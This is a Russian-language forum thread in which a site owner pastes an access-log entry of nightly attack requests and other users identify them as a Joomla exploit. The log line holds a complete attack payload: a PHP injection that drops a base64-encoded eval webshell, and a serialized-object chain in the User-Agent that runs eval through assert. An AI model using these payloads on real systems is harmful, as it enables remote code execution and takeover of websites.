Какое чучело из Китая каждую ночь обращается к моему индексному файлу
/index.php?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX 1BPU1RbMV0pOz8+'));echo '|<-'; HTTP/1.1" 403 1221 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}
Обращения идут каждые 7-10 секунд, меняется эта base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+')
строка
В его IP меняется только последняя цифра.
Сейчас я всунул в index.php проверку на IP и если опять попробует зайти, вернется на свой сайт
Игорь_Vasinsky
9.03.2016 - 18:42
толдычит он твою джумлы через дыры.
_____________
HTML, CSS (Bootstrap), JS(JQuery, ExtJS), PHP, MySQL, MSSql, Posgres, (TSql, BI OLAP, MDX), Mongo, Git, SVN, CodeIgnater, Symfony, Yii 2, JiRA, Redmine, Bitbucket, Composer, Rabbit MQ, Amazon (SQS, S3, Transcribe), Docker
Игорь_Vasinsky
Дыры в самом php? Что можно сделать?
У меня на сайте нет ничего еще кроме index.php + log
Wind
ни один раз видел на странице отображается исходник php
была даже mysql_connect с паролем к базе
В asp я такого не видел ни разу.
Может у админа 000webhost.com руки не оттуда, не знаю.
Нашел решение как мне кажется. Сменил все пароли и всунул проверку
длины строки $_SERVER['REQUEST_URI'] с последующим редиректом.
killer8080
10.03.2016 - 12:17
Цитата (sh47n @ 10.03.2016 - 00:21) |
Дыры в самом php? |
Нет, это похоже на эксплоит к джумле
Цитата (sh47n @ 10.03.2016 - 00:21) |
Что можно сделать? |
Забей, у тебя же нет джумлы
Цитата (sh47n @ 10.03.2016 - 01:36) |
ни один раз видел на странице отображается исходник php была даже mysql_connect с паролем к базе |
такое бывает при использовании коротких тегов, отключенных в конфигурации, в любом случае это не проблема php.